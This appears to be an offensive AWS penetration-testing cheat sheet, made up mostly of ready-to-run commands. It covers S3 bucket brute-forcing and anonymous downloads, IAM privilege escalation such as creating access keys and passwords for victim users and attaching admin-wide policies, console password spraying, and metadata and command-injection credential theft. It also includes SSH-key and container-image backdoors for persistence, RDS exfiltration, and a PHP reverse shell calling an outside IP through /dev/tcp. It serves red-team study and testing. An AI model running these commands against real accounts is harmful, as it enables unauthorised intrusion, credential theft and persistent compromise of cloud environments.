# AWS ## Recon - AWS Eye Found an account ID: {% embed url="" %} ## S3 Recon {% embed url="" %} ## s3enum {% embed url="" %} ## lazys3 {% embed url="" %} ## BucketLoot Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text. {% embed url="" %} ## Bruteforce S3 buckets {% embed url="" %} regions.txt ``` us-west-1 us-west-2 us-east-1 us-east-2 cn-north-1 cn-northwest-1 eu-central-1 eu-north-1 eu-west-1 eu-west-2 eu-west-3 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-south-1 ap-southeast-1 ap-southeast-2 ca-central-1 me-south-1 sa-east-1 us-gov-east-1 us-gov-west-1 ap-east-1 ``` {% embed url="" %} ``` ffuf -u "https://hlogistics-ENVIRONMENT.s3.REGION.amazonaws.com" -w "regions.txt:REGION" -w "list.txt:ENVIRONMENT" -mc 200,403 -v 2>/dev/null ``` {% embed url="" %} ## AWSBucketDump {% embed url="" %} ## CloudShovel {% embed url="" %} ## Enumeration without authentication {% embed url="" %} ## Route 53 Misconfiguration {% embed url="" %} ## S3 Enumeration Basics Check website source code - search for s3 url By default, the AWS CLI includes `prefix=` (an empty prefix) and `delimiter=/` in requests Check for `https://target.com.s3.amazonaws.com/?prefix=&delimiter=/` ### List bucket content - Anon ``` aws s3 ls s3://dev.target.com --no-sign-request aws s3 ls s3://dev.target.com --no-sign-request --recursive ```

If you found an URL like `http://target.s3.eu-west-2.amazonaws.com` remove the `s3.region.amazonaws.com part` ``` aws s3 ls s3://target --no-sign-request ``` By default AWS cli tool interacts with `s3.amazonaws.com` . If you have another domain hosting \ it, you can use `--endpoint-url` option to point the tool to another domain.

### List buckets - with profile ``` aws s3 ls --profile [profile-name] ```

``` aws s3api list-buckets --profile [profile-name] ``` ### Download one file ``` aws s3 cp s3://hl-it-admin/flag.txt . ``` ### Download all files ``` aws s3 cp s3://hl-it-admin/backup-2807/ . --recursive ``` download all of the bucket’s contents: ``` aws s3 sync s3://cybr-sensitive-data-bucket- ~/Downloads --profile victim ``` ### List the bucket ACL ``` aws s3api get-bucket-acl --bucket [bucket-name] ``` ### List & get objects ``` $ aws s3api list-objects-v2 --bucket [bucket-name] --profile [profile-name] $ aws s3api get-object --bucket [bucket-name] --key [key] --profile [profile] ./key.txt ```

### Bucket policy **Bucket Policies** are attached directly to the bucket and define what actions are allowed or denied by which principal. ``` aws s3api get-bucket-policy --bucket [bucket-name] ``` More readable ``` aws s3api get-bucket-policy --bucket [bucket-name] | jq -r '.Policy' | sed 's/\\//g' | jq ``` ## Enumerate Lambda One misconfiguration organizations often make with Lambda is including sensitive information in the environmental variables of the function ``` aws lambda list-functions --profile [profile] ```

Execute a lmabda function ``` $ aws lambda invoke --function-name [FunctionName-Parameter] --payload '{}' output.txt --profile admin ```

## EC2 acting as a reverse-proxy {% content-ref url="ssrf-rce" %} [ssrf-rce](https://0xss0rz.gitbook.io/0xss0rz/cloud/ssrf-rce) {% endcontent-ref %} ``` curl -s http://[EC2_IP]/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254' ```

## Enumerating EC2s ``` aws ec2 describe-instances --profile ec2-profile ``` Snapshots ? ``` aws --profile [profile-name] ec2 describe-snapshots --owner-id [account-id] --region us-west-2 ``` ### Exploit snapshot Snapshot found ``` $ aws --profile 0xss0rz ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id [snap-id] ``` 1. Launch a ec2 instance (create ssh key pair) 2. Attach the snapshot created to the ec2 instance

Connect to the instance and mount the snapshot ``` $ lsblk $ sudo mount /dev/xvdb1 /mnt ```

## SecretsManager ``` aws iam get-user-policy --user-name [Username] --profile [Profile] --policy-name [Policy-name] { <-SNIP-> { "Action": [ "secretsmanager:GetSecretValue", "secretsmanager:ListSecretVersionIds", "secretsmanager:GetResourcePolicy", "secretsmanager:DescribeSecret" ], "Resource": [ "arn:aws:secretsmanager:us-east-1:014498641740:secret:intro-to-secrets-manager-enumeration-1747034276755-password*", "arn:aws:secretsmanager:us-east-1:014498641740:secret:intro-to-secrets-manager-enumeration-1747034276755-api-key*" ], "Effect": "Allow", "Sid": "AllowSecretsManagerActions" }, { "Action": [ "secretsmanager:ListSecrets" ], "Resource": "*", "Effect": "Allow", "Sid": "AllowListSecrets" } ] } } ``` ``` $ aws secretsmanager list-secrets --query 'SecretList[*].[Name, Description, ARN]' --output json ``` ``` # Lists the versions for a specific secret # To issue this command, you must have secretsmanager:ListSecretVersionIds access aws secretsmanager list-secret-version-ids --secret-id ``` Get secret ``` aws secretsmanager get-secret-value --secret-id ext/cost-optimization ``` ## DynamoDB List tables ``` $ aws --endpoint-url=http://localhost:4566 dynamodb list-tables --no-sign-request --region us-east-1 ```

View Content ``` $ aws --endpoint-url=http://localhost:4566 dynamodb scan --table-name users --no-sign-request --region us-east-1 ```

## Amazon RDS - Relational Database Service Amazon RDS supports several database instances including: 1. Amazon Aurora (port 3306) 2. PostgreSQL (5432) 3. MySQL (port 3306) 4. MariaDB (port 3306) 5. Oracle Database (port 1521) 6. SQL Server (port 1433) Bruteforce attack: {% content-ref url="../pentest/protocols/mysql-3306" %} [mysql-3306](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mysql-3306) {% endcontent-ref %} The `tmpdir` variable provides further confirmation that this is an AWS RDS instance ``` SHOW GLOBAL VARIABLES like 'tmpdir'; ```

## AWS CLI

Keep track of profiles ``` cat ~/.aws/credentials ``` ### Configure a named profile ``` aws configure --profile [profile-name] ``` {% embed url="" %} Or ``` aws configure set aws_access_key_id [key-id] --profile [profile-name] aws configure set aws_secret_access_key [key-id] --profile [profile-name] aws configure set aws_session_token [token] --profile [profile-name] aws sts get-caller-identity --profile [profile-name] ``` Or ``` $ export AWS_ACCESS_KEY_ID= $ export AWS_SECRET_ACCESS_KEY= $ export AWS_SESSION_TOKEN= $ aws configure ``` {% embed url="" %} ### Information about configured identity ``` aws sts get-caller-identity --profile [profile-name] ``` {% embed url="" %} ### Stored Credentials Windows ``` C:\Users\UserName\.aws ```

Linux ``` /home/UserName/.aws ```

``` cat credentials ```

### Enumeration - Users ``` aws iam list-users # With profile aws iam list-users --profile [profile-name] ``` List the IAM groups that the specified IAM user belongs to : ``` aws iam list-groups-for-user --user-name [user-name] ``` List all manages policies that are attached to the specified IAM user : ``` aws iam list-attached-user-policies --user-name [user-name] # With profile aws iam list-attached-user-policies --user-name [user-name] --profile [profile-name] aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy aws iam get-policy-version --profile [☺profile] --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v1 ``` Lists the names of the inline policies embedded in the specified IAM user : ``` aws iam list-user-policies --user-name [user-name] ``` Get policy ``` aws iam get-user-policy --user-name [user-name] --policy-name [policy-name] ``` ### Enumeration - Groups IAM Groups ``` aws iam list-groups ``` All users in a group ``` aws iam get-group --group-name [group-name] ``` All managed policies that are attached to the specified IAM Group ``` aws iam list-attached-group-policies --group-name [group-name] ``` Names of the inline policies embedded in the specified IAM Group ``` aws iam list-group-policies --group-name [group-name] ``` ### Enumeration - Roles List of IAM Roles ``` aws iam list-roles ``` All managed policies that are attached to the specified IAM role ``` aws iam list-attached-role-policies --role-name [ role-name] ``` Names of the inline policies embedded in the specified IAM role ``` aws iam list-role-policies --role-name [ role-name] ``` ### Enumeration - Policies List of all iam policies ``` aws iam list-policies ``` Information about the specified managed policy ``` aws iam get-policy --policy-arn [policy-arn] # With profile aws iam get-policy --policy-arn [policy-arn] --profile [profile-name] ``` Information about the versions of the specified manages policy ``` aws iam list-policy-versions --policy-arn [policy-arn] ``` Information about the specified version of the specified managed policy ``` aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id] # Example aws iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4 # With profile aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id] --profile [profile-name] ``` One of the permissions is `iam:CreatePolicyVersion` ? Use this to create a new version of the attached policy with privileged access ``` aws iam create-policy-version --policy-arn [policy-arn] --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default --profile [profile-name] ``` Specified inline policy document that is embedded on the specified IAM user / group / role ``` aws iam get-user-policy --user-name user-name --policy-name [policy-name] aws iam get-group-policy --group-name group-name --policy-name [policy-name] aws iam get-role-policy --role-name role-name --policy-name [policy-name] ``` ### Enumeration - Cloud Services (EC2, S3 etc.) in an Organization AWS Account ``` aws ec2 describe-instances --profile [profile-name] ``` ``` aws ec2 describe-instances --filters Name=instance-state-name,Values=running --query 'Reservations[].Instances[].[Tags[?Key==`Name`].Value | [0],InstanceId,Platform,State.Name,PrivateIpAddress,PublicIpAddress,InstanceType,PublicDnsName,KeyName]' ```

This might not return any results if you aren't in the same region. -> Run pacu `ec2__enum` module ### Enumeration - Get Bucket Policy ``` aws s3api get-bucket-policy --bucket [bucket-name] # Example # aws s3api get-bucket-policy --bucket hl-it-admin ``` ### DynamoDB ``` aws dynamodb list-tables aws dynamodb describe-table --table [table-name] ``` ### CodeCommit ``` aws codecommit list-repositories aws codecommit get-repository --repository-name [repo-name] # List branches aws codecommit list-branches --repository-name [repo-name] # Get details aws codecommit get-branch --repository-name [repo-name] --branch-name dev # Get the parent commit aws codecommit get-commit --repository-name [repo-name] --commit-id [commit-id] # Find the files that changed between commits aws codecommit get-differences --repository-name [repo-name] --before-commit-specifier [parent-id] --after-commit-specifier [commit-id] # Download file aws codecommit get-file --repository-name [repo-name] --commit-specifier [commit-id] --file-path [file-path] ``` ### SSRF {% content-ref url="ssrf-rce" %} [ssrf-rce](https://0xss0rz.gitbook.io/0xss0rz/cloud/ssrf-rce) {% endcontent-ref %} ## EC2 - Get Password ``` aws ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem ``` ## Spray AWS Console IAM Logins {% embed url="" %} ``` ./GoAWSConsoleSpray -a ACCOUNTID -u ../../users -p ../../passwords ``` To get the `ACCOUNTID` , run `aws sts get-caller-identity` with a known account

## Pacu ``` $ pip3 install -U pacu $ pacu ``` {% embed url="" %} Setting the initial user access key ``` set_keys ```

### Permission of current logged-in user ``` exec iam__enum_permissions whoami ``` ### Bruteforce IAM permissions ``` run iam__bruteforce_permissions ``` ### Enumerate ec2 instance and get the public ip addresses ``` exec ec2__enum data EC2 ```

### Enumerate privilege escalation permission and exploit it ``` exec iam__privesc_scan ``` {% embed url="" %}

## Subdomain Takeover AWS Elastic Beanstalk {% embed url="" %} {% content-ref url="../pentest/protocols/dns-53" %} [dns-53](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/dns-53) {% endcontent-ref %} ## Privilege escalation opportunities in IAM configurations {% embed url="" %} ## IAM Privilege escalation {% hint style="success" %} *List inline policies, attached policies and group policies* {% endhint %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ### IAM Enumeration Tools #### PMapper {% embed url="" %} #### CloudPEASS {% embed url="" %} ``` python3 AWSPEAS.py --profile --region ```

#### IAMActionHunter {% embed url="" %} #### IAMFinder {% embed url="" %} #### EnumerateIAM {% embed url="" %} ``` python3 enumerate-iam.py --access-key [access_key] --secret-key [secret_key] > results.txt ``` #### aws\_iam\_enum {% embed url="" %} ``` python3 iam-enum.py --user-name [username] --profile [profile] ```

#### aws\_escalate.py {% embed url="" %} ``` python3 aws_escalate.py --user-name [username] --access-key-id [access_key] --secret-key [secret_key] ``` #### [Pacu](#pacu) ### Multiple privesc vectors Multiple privesc vectors in a single policy * lambda:UpdateFunctionConfiguration * [iam:CreatePolicyVersion](#iam-createpolicyversion) * [iam:SetDefaultPolicyVersion](#iam-setdefaultpolicyversion) * iam:PassRole + ec2:RunInstances: Creating an EC2 instance with an existing instance profile * [iam:CreateAccessKey](#iam-createaccesskey): Creating a new user access key * [iam:CreateLoginProfile](#iam-createloginprofile): Creating a new login profile * [iam:UpdateLoginProfile](#iam-updateloginprofile): Updating an existing login profile * [iam:AttachUserPolicy](#iam-attachuserpolicy): Attaching a policy to a user * [iam:AttachGroupPolicy](#iam-attachgrouppolicy): Attaching a policy to a group * [iam:AttachRolePolicy](#iam-attachrolepolicy): Attaching a policy to a role * [iam:PutUserPolicy](#iam-putuserpolicy): Creating/updating an inline policy for a user * [iam:PutGroupPolicy](#iam-putgrouppolicy): Creating/updating an inline policy for a group * [iam:PutRolePolicy](#iam-putrolepolicy): Creating/updating an inline policy for a role * [iam:AddUserToGroup](#iam-addusertogroup): Adding a user to a group * [iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction](#iam-passrole--lambda-createfunction--lambda-invokefunction): Passing a role to a new Lambda function, then invoking it * iam:PassRole + lambda:CreateFunction + lambda:AddPermission * iam:UpdateAssumeRolePolicy + sts:AssumeRole: Updating the AssumeRolePolicyDocument of a role * [lambda:UpdateFunctionCode](#lambda-updatefunctionconfiguration): Updating the code of an existing Lambda function ### iam:CreateAccessKey {% embed url="" %} An attacker with the `iam:CreateAccessKey` permission on other users can create an access key ID and secret access key belonging to another user in the AWS environment ``` aws iam create-access-key --user-name target_user ```

``` $ aws iam create-access-key --user-name [Victim-Username] --profile [profile-name] --output text | tee creds.txt ```

### iam:CreateLoginProfile {% embed url="" %} An attacker with the `iam:CreateLoginProfile` permission on other users can create a password to use to login to the AWS console on any user that does not already have a login profile setup. ``` aws iam create-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile] ```

{% hint style="success" %} *arn:aws:iam::\[Account\_ID]:user/\[Username]* {% endhint %} You can now login as the victim into the AWS console {% embed url="" %} ### iam:UpdateLoginProfile ``` aws iam update-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile] ``` You can now login as the victim into the AWS console - See [iam:CreateAccessKey](#iam-createaccesskey) ### iam:CreatePolicyVersion {% embed url="" %} Create a new version of an IAM policy that they have access to. ``` aws iam create-policy-version --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy --policy-document file://path/to/administrator/policy.json --set-as-default ``` administrator/policy.json ``` { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] } ``` ### iam:SetDefaultPolicyVersion ``` aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 ``` Where “v2” is the policy version with the most privileges available. Example: CloudGOAT - iam\_privesc\_by\_rollback

With Pacu:

### iam:AddUserToGroup ``` aws iam add-user-to-group --group-name [group-name@ --user-name [username] --profile [profile] ``` ### iam:AttachUserPolicy {% embed url="" %} ``` aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/AdministratorAccess ``` If attaching `AdministratorAccess` fails, try to attach another dangerous permission such as `SecretsManagerReadWrite` ``` aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite ``` ### iam:AttachGroupPolicy ``` aws iam attach-group-policy --group-name [group_attached_to_user] --policy-arn arn:aws:iam::aws:policy/SecretsManager ``` Also try with `AdministratorAccess` - See [iam:AttachUserPolicy](#iam-attachuserpolicy) ### iam:PutUserPolicy Create a policy document `policy.json` ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] } ``` ``` aws iam put-user-policy --user-name [username] --policy-name test --policy-document file://policy.json ``` Check if the policy is in place: ``` $ aws iam list-user-policies --user-name [username] $ aws iam get-user-policy --user-name [username] --policy-name test ``` ### iam:PutGroupPolicy Create `policy.json` ```json { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] ``` Upload the policy to your group ``` aws iam put-group-policy --group-name [group] --policy-name admin --policy-document file://policy.json ``` ### iam:AttachRolePolicy {% embed url="" %} Find a role you can assume: `"Action": "sts:AssumeRole"` ``` aws iam list-roles ``` Attach Role Policy ``` aws iam attach-role-policy --role-name [role_you_can_assume] --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess ``` ### iam:PutRolePolicy Find a role you can assume - See [iam:AttachRolePolicy](#iam-attachrolepolicy) Create `policy.json` ``` { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] } ``` Put the role ``` aws iam put-role-policy --role-name [role_you_can_assume] --policy-name secretsaccess --policy-document file://policy.json ``` ### sts:AssumeRole {% embed url="" %} List of IAM roles ``` aws iam list-roles ``` Retrieve trust relationship between role and user ``` aws2 iam get-role --role-name [role-name] ``` List managed policies attached to the specified role ``` aws iam list-attached-role-policies --role-name [role-name] ``` Retrieve information about the specified version of the managed policy ``` aws iam get-policy-version --policy-arn [policy-arn] --version-id [vid] ``` Assume role - retrieve temporary security credentials of assumed role ``` aws sts assume-role --role-arn [role-arn] --role-session-name [sessionname] ``` Use the credentials ``` $ export AWS_ACCESS_KEY_ID=[access_key] $ export AWS_SECRET_ACCESS_KEY=[secret_key] $ export AWS_SESSION_TOKEN=[session_token] $ aws sts get-caller-identity ``` ### lambda:UpdateFunctionConfiguration {% embed url="" %} Allow to attach a layer to a function ``` aws lambda update-function-code --function-name [my-function] --zip-file fileb://my-function.zip ``` ## iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction ``` $ aws lambda create-function --function-name [function-name] --runtime python3.7 --zipe-file fileb://my-function.zip --handle [my-function.handler] --role [role-arn] --region [region] $ aws lambda invoke --function-name [function-name] response.json --region [region] ``` ## IAM Security Assessment {% embed url="" %} ## Metadata {% embed url="" %} ## Unauthorized Access to Metadata and User Data {% embed url="" %} ## AWS Enumerator {% embed url="" %} ``` ./aws-enumerator cred -aws_access_key_id AKIA***********XKU -aws_region us-west-2 -aws_secret_access_key kIm6m********************5JPF ./aws-enumerator enum --services all # Permissions ./aws-enumerator dump --services dynamodb ``` ## S3 Misconfiguration - Permissions {% embed url="" %} ### S3Scanner {% embed url="" %} ### Checkov {% embed url="" %} ### Nuclei Templates {% embed url="" %} ### AWS Extender - Burp Extension {% embed url="" %} ### List Permissions ``` aws s3 ls s3://{BUCKET_NAME} --no-sign-request ```

### Read Permissions ``` aws s3api get-object --bucket {BUCKET_NAME} --key archive.zip ./OUTPUT --no-sign-request ``` ### Download Permissions ``` aws s3 cp s3://{BUCKET_NAME}/intigriti.txt ./ --no-sign-request ``` ### Write Permissions ``` aws s3 cp intigriti.txt s3://{BUCKET_NAME}/intigriti-ac5765a7-1337-4543-ab45-1d3c8b468ad3.txt --no-sign-request ``` {% hint style="info" %} *Make sure to use a filename with a non-trivial name to prevent any disruption* {% endhint %}

Upload a shell ``` $ echo "& /dev/tcp/10.10.14.39/4444 0>&1 \"');?>" > rs.php $ aws s3 cp rs.php s3://adserver/rs.php --endpoint-url=http://s3.bucket.htb --no-sign-request upload: ./rs.php to s3://adserver/rs.php $ curl http://bucket.htb/rs.php ``` ### Read Permissions on ACL ``` aws s3api get-bucket-acl --bucket {BUCKET_NAME} --no-sign-request ``` ``` aws s3api get-object-acl --bucket {BUCKET_NAME} --key index.html --no-sign-request ``` ### Write Permissions on ACL ``` aws s3api put-bucket-acl --bucket {BUCKET_NAME} --grant-full-control emailaddress={EMAIL} --no-sign-request ``` {% hint style="info" %} *You do not have to always necessarily change an ACL to test for write permissions if read permissions are enabled. You can simply check the "Grants" property in the response to a read operation and verify if any unauthorized users are allowed to perform the write operation!* {% endhint %} ### S3 Versioning ``` curl -sI http://target.s3.region.com/statis/js/auth.js # Look for x-amz-id header ``` ``` aws s3api get-bucket-versioning --bucket {BUCKET_NAME} --no-sign-request ``` List object versions. ``` aws s3api list-object-versions --bucket [bucket-name] --query "Versions[?VersionId!='null']" --no-sign-request ``` ``` aws s3api get-object --bucket [bucket-name] --key "[key-name]" --version-id "[version-id]" filename.js --no-sign-request ``` ## S3 - Shadow Resources {% embed url="" %} ## Security Groups - Segmentation {% embed url="" %} {% embed url="" %} ### AWS Attack Path Management Tool {% embed url="" %} ## Persistence - IAM Role Anywhere An attacker with sufficient permissions could exploit IAM Roles Anywhere to gain persistent access to an AWS account {% embed url="" %} {% embed url="" %} ## VPC - Virtual Private Cloud ### Enumeration Describe aboute VPCs ``` aws ec2 describe-vpcs ``` Describe about subnets ``` aws ec2 describe-subnets ``` Describe about route table ``` aws ec2 describe-route-tables ``` Describe about Network ACL (NACL) ``` aws ec2 describe-network-acls ``` ### Lateral Movement / Pivoting {% embed url="" %} Describes all VPC Peering Connections \\ ``` aws ec2 describe-vpc-peering-connections ``` Describe about Subnet of the specified VPC : ``` aws ec2 describe-subnets --filters "Name=vpc-id, Values=[VpcID]" ``` Describe about Route Table of the specified Subnet ``` aws ec2 describe-route-tables --filters "Name=vpc-id, Values=[VpcID]" ``` Describe about Network ACL of the specified VPC ``` aws ec2 describe-network-acls --filters "Name=vpc-id, Values=[VpcID]" ``` Describe about EC2 Instances In the specified VPC ``` aws ec2 describe-instances --filters "Name=vpc-id, Values=[VpcID]" ``` Describe about EC2 Instances In the specified Subnet ``` aws ec2 describe-instances --filters "Name=subnet-id, Values=[SubnetID]" ``` ## EC2 - Elastic Compute Cloud ### Enumeration Describes the information about all instances ``` aws ec2 describe-instances ``` Describes the information about specified instance ``` aws ec2 describe-instances --instance-ids [instace-id] ``` Describes the information about UserData Attribute of the specified Instance ``` aws ec2 describe-instance-attribute --atribute userData --instance-id [instance-id] ``` Describes the infroamtion about IAM instance profile associations ``` aws ec2 describe-iam-instance-profile-associations ``` ### Exploitation SSRF/RCE {% content-ref url="ssrf-rce" %} [ssrf-rce](https://0xss0rz.gitbook.io/0xss0rz/cloud/ssrf-rce) {% endcontent-ref %} #### AWS Metadata * IMDV1 ``` curl http://169.254.169.254/latest/meta-data/ ``` * IMDV2 ``` TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/ ``` #### AWS Userdata * IMDV1 ``` curl http://169.254.169.254/latest/user-data/ ``` * IMDV2 ``` TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/user-data/ ``` ### EC2StepShell {% embed url="" %} ### Persistence Generate SSH key pair ``` ssh-keygen ``` On EC2 instance, add private key to user ssh directory ``` echo "ssh_public_key" >> /home/user/.ssh/authorized_keys ``` Access EC2 using ssh backdoor key ``` ssh -i "ssh_private_key" user@ec2_public_ip ``` ### Privilege Escalation {% embed url="" %} ## Lambda Function ### Enumeration List of all lambda functions ``` aws lambda list-functions ``` Retrieve the information about the specified lambda function ``` aws lambda get-function --function-name [function-name] ``` Retrieve the policy information about the specified lambda function ``` aws lambda get-policy --function-name [function-name] ``` Retrieve the event source mapping information about the specified lambda function ``` aws lambda list-event-source-mappings --function-name [function-name] ``` List of all the layers (dependencies) in aws account ``` aws lambda list-layers ``` Retrieve the full information about the specified layer name ``` aws lambda get-layer-version --layer-name [layername] --version-number [version-number] ``` List of all the REST APIs ``` aws apigateway get-rest-apis ``` Get the information about specified API ``` aws apigateway get-rest-api --rest-api-id [api-id] ``` List information about a collection of resources ``` aws apigateway get-resources --rest-api-id [api-id] ``` Get information about the specified resource ``` aws apigateway get-resource --rest-api-id [api-id] --resource-id [resource-id] ``` Get the method information for the specified resource ``` aws apigateway get-method --rest-api-id [api-id] --resource-id [resource-id] --http-methode [method] ``` List of all stages for a REST API ``` aws apigateway get-stages --rest-api-id [api-id] ``` Get the information about specified API's stage ``` aws apigateway get-api-keys --include-values ``` Get the information about a specified API key ``` aws apigateway get-api-key --api-key [api-key] ``` ### Credential Access #### RCE Lambda function vulnerable to command injection {% content-ref url="../pentest/web-attacks/command-injection" %} [command-injection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/command-injection) {% endcontent-ref %} ``` https://vulnerable.lambda.amazonaws.com/prod/system?cmd=id https://vulnerable.lambda.amazonaws.com/prod/system?cmd=env ``` #### SSRF ``` https://vulnerable.lambda.amazonaws.com/prod/vuln?url=http://localhost:9001/2025-05-15/runtime/invocation/next https://vulnerable.lambda.amazonaws.com/prod/vuln?url=file://proc/self/environ ``` #### Using CLI Environment variable: ``` aws lambda get-function --function-name [function-name] ``` ### Persistence [lambda:UpdateFunctionCode](#lambda-updatefunctionconfiguration) ### PrivEsc [iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction](#iam-passrole--lambda-createfunction--lambda-invokefunction) ## Containers 3 categories: * **Registry**: store and manage container images: ECR (Elastic Container Registry) * **Orchestration**: when and where containers run: ECS (Elastic Container Service) and EKS (Elastic Kubernetes Service) * **Compute**: run containers: Fargate (servless compute engine) and EC2 ### Enumeration #### ECR Repositories in the container registry ``` aws ecr describe-repositories ``` Information about the repo policy ``` aws ecr get-repository-policy --repository-name [repo-name] ``` List all images in the specified repository ``` aws ecr list-images --repository-name [repo-name] ``` Information about a container image ``` aws ecr describe-images --repository-name [repo-name] --image-ids imageTag=[imageTag] ``` #### ECS List all ECS clusters ``` aws ecs list-clusters ``` Information about specified cluster ``` aws ecs describe-clusters --cluster [cluster-name] ``` List all services in the specified cluster ``` aws ecs list-services --cluster [cluster-name] ``` Information about a specified service ``` aws ecs describe-services --cluster [cluster-name] --services [service-name] ``` List all tasks in the specified cluster ``` aws ecs describe-tasks --cluster [cluster-name] --tasks [task-arn] ``` List all containers in the specified cluster ``` aws ecs list-container-instances --cluster [cluster-name] ``` #### EKS List all EKS clusters ``` aws eks list-clusters ``` Information about a specified cluster ``` aws eks describe-cluster --name [cluster-name] ``` List of all node groups in a specified cluster ``` aws eks list-nodegroups --cluster-name [cluster-name] ``` Information about a specified node group in a cluster ``` aws eks describe-nodegroup --cluster-name [cluster-name] --nodegroup-name [node-group] ``` List of all fargate in a specified cluster ``` aws eks list-fargate-profiles --cluster-name [cluster-name] ``` Information about a specific fargate profile in a cluster ``` aws eks describe-fargate-profile --cluster-name [cluster-name] --fargate-profile-name [profile-name] ``` ### Initial Access RCE - Command injection * List of all secret in EKS vulnerable container ``` http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=ls%20%20%20/var/run/secrets/kubernetes.io/serviceaccount ``` * Get the secret information from running EKS vulnerable container ``` http://vulnerable.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=2.elb.amazonaws.com/?cmd=cat%20%20%20/var/run/secrets/kubernetes.io/serviceaccount/token ``` ### Persistence Authenticate docker daemon to ECR ``` aws ecr get-login-password --region [region] | docker login --username AWS --password-stdin [ECR-Addr] ``` Build backdoored docker image ``` docker build -t [Image-name] . ``` Tag the docker image ``` docker tag [Image-name] [ECR-addr]:[Image-name] ``` Push the docker image to AWS Container Registry ``` docker push [ECR-addr]:[Image-name] ``` ## S3 - Simple Storage Service ### Enumeration List of all the bucket in the AWS account ``` aws s3api list-buckets ``` Information about specified bucket ACLs ``` aws s3api get-bucket-acl --bucket [bucket-name] ``` Information about specified bucket policy ``` aws s3api get-bucket-policy --bucket [bucket-name] ``` Retrieve eh Public Access Block configuration for an Amazon S3 bucket ``` aws s3api get-public-access-block --bucket [bucket-name] ``` List of all the objects in specified bucket ``` aws s3api list-objects --bucket [bucket-name] ``` ACLs information about the specified object ``` aws s3api get-object-acl --bucket [bucket-name] --key [object-name] ``` ## RDS - Relational Database Service ### Enumeration Information about the clusters in RDS ``` aws rds describe-db-clusters ``` Information about the database instances in RDS ``` aws rds describe-db-instances ``` Information about the subnet group in RDS ``` aws rds describe-db-subnet-groups ``` Information about the database security groups in RDS ``` aws rds describe-db-security-groups ``` Information about the database proxies in RDS ``` aws rds describe-db-proxies ``` ### Data Exfiltration #### Password Based ``` mysql -h hostname -u username -P port -p password ``` {% content-ref url="../pentest/protocols/mysql-3306" %} [mysql-3306](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/mysql-3306) {% endcontent-ref %} #### IAM Based Authentication (token) Get the database instance connection temporary token from the RDS endpoint ``` aws rds generate-db-auth-token --hostname [hostname] --port [port] --username [username] --region [region] ``` Connect to mysql using temporary token ``` mysql -h hostname -u username -P port --enable-cleartext-plugin --password=$TOKEN ``` ### Snapshots Public snapshots from single RDS database instances that belong to AWS account ID ``` aws rds describe-db-snapshots --snapshot-type public --include-public --region us-east-1 | grep [account-ID] ``` Public snapshots from RDS database cluster instances ``` aws rds describe-db-cluster-snapshots --snapshot-type public --include-public --region us-east-1 | grep [account-ID] ``` The snapshot can be restored. From the `Actions` menuin GUI, select `Restore snapshot` ## EBS - Elastic Block Store A block storage system used to store persistent data. used for EC2 instances. ### Enumeration Information about EBS volumes ``` aws ec2 describe-volumes ``` All available EBS snapshots ``` aws ec2 describe-snapshots --owner-ids self aws ec2 describe-snapshots --owner-ids [☺account-id] --region [region] ```

Create volume permissions ``` aws ec2 describe-snapshot-attribute --attribute createVolumePermission --snapshot-id [snapshot-id] --region [region] ```

The value of `Group` is set to `all`. This reveals that it is a publicly accessible snapshot and any AWS user will be able to create a volume from this public snapshot into their AWS Account. Enumerate public snapshots ``` aws ec2 describe-snapshots --owner-id self --restorable-by-user-ids all --no-paginate --region [region] ```

